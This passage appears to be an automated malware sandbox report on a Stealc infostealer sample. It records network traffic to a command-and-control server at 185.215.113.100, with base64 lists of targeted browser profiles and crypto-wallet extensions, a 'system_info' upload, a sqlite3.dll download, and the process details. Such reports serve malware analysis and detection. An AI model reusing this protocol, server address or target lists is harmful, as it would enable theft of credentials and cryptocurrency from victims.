              Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
              Sep 1, 2024 20:53:59.714000940 CEST512INData Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32
              Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
              Sep 1, 2024 20:53:59.715400934 CEST469OUTPOST /e2b1563c6670f193.php HTTP/1.1
              Content-Type: multipart/form-data; boundary=----KFIIJJJDGCBAAKFIIECG
              Host: 185.215.113.100
              Content-Length: 267
              Connection: Keep-Alive
              Cache-Control: no-cache
              Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 31 33 31 35 30 64 31 63 36 63 33 35 36 38 64 34 66 39 63 35 62 33 37 64 64 38 65 66 66 33 66 36 35 35 62 66 37 66 66 38 38 62 63 38 33 63 31 36 37 30 33 30 39 37 61 33 34 30 33 63 64 63 62 32 66 34 65 37 37 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 2d 2d 0d 0a
              Data Ascii: ------KFIIJJJDGCBAAKFIIECGContent-Disposition: form-data; name="token"2d13150d1c6c3568d4f9c5b37dd8eff3f655bf7ff88bc83c16703097a3403cdcb2f4e77e------KFIIJJJDGCBAAKFIIECGContent-Disposition: form-data; name="message"plugins------KFIIJJJDGCBAAKFIIECG--
              Sep 1, 2024 20:54:00.006369114 CEST1236INHTTP/1.1 200 OK
              Date: Sun, 01 Sep 2024 18:53:59 GMT
              Server: Apache/2.4.52 (Ubuntu)
              Vary: Accept-Encoding
              Content-Length: 7116
              Keep-Alive: timeout=5, max=97
              Connection: Keep-Alive
              Content-Type: text/html; charset=UTF-8
              Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
              Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
              Sep 1, 2024 20:54:00.006382942 CEST164INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
              Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9n
              Sep 1, 2024 20:54:03.198895931 CEST1236INData Raw: 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 77 78 66 44 42 38 4d 48 78 54 62 32 78 73 5a 58 52 38 5a 6d 68 74 5a 6d 56 75 5a 47 64 6b 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47
              Data Ascii: a2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZ
              Sep 1, 2024 20:54:03.198987007 CEST164INData Raw: 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c 5a 47 78 77 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d
              Data Ascii: ZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6
              Sep 1, 2024 20:54:03.398574114 CEST1236INData Raw: 51 6d 39 34 66 47 31 75 5a 6d 6c 6d 5a 57 5a 72 59 57 70 6e 62 32 5a 72 59 32 70 72 5a 57 31 70 5a 47 6c 68 5a 57 4e 76 59 32 35 72 61 6d 56 6f 66 44 46 38 4d 48 77 77 66 46 52 6c 62 58 42 73 5a 58 78 76 62 32 74 71 62 47 4a 72 61 57 6c 71 61 57
              Data Ascii: Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF8MHwwfFJvbmluIFdhbGxldHxram1vb2hsZ29rY2NvZGljampmZWJmb21sYmxqZ2Zoa3wxfDB
              Sep 1, 2024 20:54:03.398598909 CEST1236INData Raw: 5a 32 35 73 62 57 70 6c 5a 57 64 71 59 57 64 73 62 57 56 77 59 6d 31 77 61 33 42 70 66 44 46 38 4d 48 77 77 66 46 52 79 5a 58 70 76 63 69 42 51 59 58 4e 7a 64 32 39 79 5a 43 42 4e 59 57 35 68 5a 32 56 79 66 47 6c 74 62 47 39 70 5a 6d 74 6e 61 6d
              Data Ascii: Z25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ
              Sep 1, 2024 20:54:03.398610115 CEST328INData Raw: 61 33 77 77 66 44 42 38 4d 58 78 55 63 6e 56 7a 64 43 42 58 59 57 78 73 5a 58 52 38 5a 57 64 71 61 57 52 71 59 6e 42 6e 62 47 6c 6a 61 47 52 6a 62 32 35 6b 59 6d 4e 69 5a 47 35 69 5a 57 56 77 63 47 64 6b 63 47 68 38 4d 58 77 77 66 44 42 38 55 6d
              Data Ascii: a3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFd
              Sep 1, 2024 20:54:03.602771997 CEST1236INData Raw: 61 57 52 6c 61 6d 52 6c 62 57 64 76 62 32 4e 6f 63 47 35 72 62 57 52 71 63 47 39 6a 5a 32 74 6f 59 58 77 78 66 44 42 38 4d 48 78 44 62 32 6c 75 61 48 56 69 66 47 70 6e 59 57 46 70 62 57 46 71 61 58 42 69 63 47 52 76 5a 33 42 6b 5a 32 78 6f 59 58
              Data Ascii: aWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXBobGRha2lrZ2VmfDF8MHwwfE11bHRpdmVyc1ggRGVGaSBXYWxsZXR8ZG5nbWxibGNvZGZvYnBkcGVjYWFkZ2ZiY2dnZmpmbm18MXwwfDB8RnJvbnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamt
              Sep 1, 2024 20:54:03.602945089 CEST508INData Raw: 66 44 42 38 56 47 39 75 61 32 56 6c 63 47 56 79 49 46 64 68 62 47 78 6c 64 48 78 76 62 57 46 68 59 6d 4a 6c 5a 6d 4a 74 61 57 6c 71 5a 57 52 75 5a 33 42 73 5a 6d 70 74 62 6d 39 76 63 48 42 69 59 32 78 72 61 33 77 78 66 44 42 38 4d 48 78 50 63 47
              Data Ascii: fDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8cGVuamxkZGpramdwbmtsbGJvY2NkZ2NjZWtwa2NiaW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJwbWhpaGVobWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHx
              Sep 1, 2024 20:54:03.634809017 CEST470OUTPOST /e2b1563c6670f193.php HTTP/1.1
              Content-Type: multipart/form-data; boundary=----BKJKJEHJJDAKECBFCGID
              Host: 185.215.113.100
              Content-Length: 268
              Connection: Keep-Alive
              Cache-Control: no-cache
              Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 31 33 31 35 30 64 31 63 36 63 33 35 36 38 64 34 66 39 63 35 62 33 37 64 64 38 65 66 66 33 66 36 35 35 62 66 37 66 66 38 38 62 63 38 33 63 31 36 37 30 33 30 39 37 61 33 34 30 33 63 64 63 62 32 66 34 65 37 37 65 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 2d 2d 0d 0a
              Data Ascii: ------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="token"2d13150d1c6c3568d4f9c5b37dd8eff3f655bf7ff88bc83c16703097a3403cdcb2f4e77e------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="message"fplugins------BKJKJEHJJDAKECBFCGID--
              Sep 1, 2024 20:54:03.914266109 CEST335INHTTP/1.1 200 OK
              Date: Sun, 01 Sep 2024 18:54:03 GMT
              Server: Apache/2.4.52 (Ubuntu)
              Vary: Accept-Encoding
              Content-Length: 108
              Keep-Alive: timeout=5, max=96
              Connection: Keep-Alive
              Content-Type: text/html; charset=UTF-8
              Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
              Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
              Sep 1, 2024 20:54:03.993865967 CEST203OUTPOST /e2b1563c6670f193.php HTTP/1.1
              Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJ
              Host: 185.215.113.100
              Content-Length: 5531
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 1, 2024 20:54:03.993901968 CEST5531OUTData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 46 49 44 41 46 42 46 42 41 4b 46 48 4a 45 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 31 33 31 35
              Data Ascii: ------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="token"2d13150d1c6c3568d4f9c5b37dd8eff3f655bf7ff88bc83c16703097a3403cdcb2f4e77e------EGCFIDAFBFBAKFHJEGIJContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
              Sep 1, 2024 20:54:06.322704077 CEST202INHTTP/1.1 200 OK
              Date: Sun, 01 Sep 2024 18:54:04 GMT
              Server: Apache/2.4.52 (Ubuntu)
              Content-Length: 0
              Keep-Alive: timeout=5, max=95
              Connection: Keep-Alive
              Content-Type: text/html; charset=UTF-8
              Sep 1, 2024 20:54:06.598507881 CEST94OUTGET /0d60be0de163924d/sqlite3.dll HTTP/1.1
              Host: 185.215.113.100
              Cache-Control: no-cache
              Sep 1, 2024 20:54:06.895553112 CEST1236INHTTP/1.1 200 OK
              Date: Sun, 01 Sep 2024 18:54:06 GMT
              Server: Apache/2.4.52 (Ubuntu)
              Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
              ETag: "10e436-5e7ec6832a180"
              Accept-Ranges: bytes
              Content-Length: 1106998
              Content-Type: application/x-msdos-program
              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:14:53:54
              Start date:01/09/2024
              Path:C:\Users\user\Desktop\file.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\file.exe"
              Imagebase:0x320000
              File size:1'751'552 bytes
              MD5 hash:E327E97714AA25537FDE40F3C48EFDE7
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2800489909.000000000038A000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2801350861.000000000119E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low
              Has exited:true

              Target ID:6
              Start time:14:54:59
              Start date:01/09/2024
              Path:C:\Windows\SysWOW64\WerFault.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 1600
              Imagebase:0xf30000
              File size:483'680 bytes
              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              No disassembly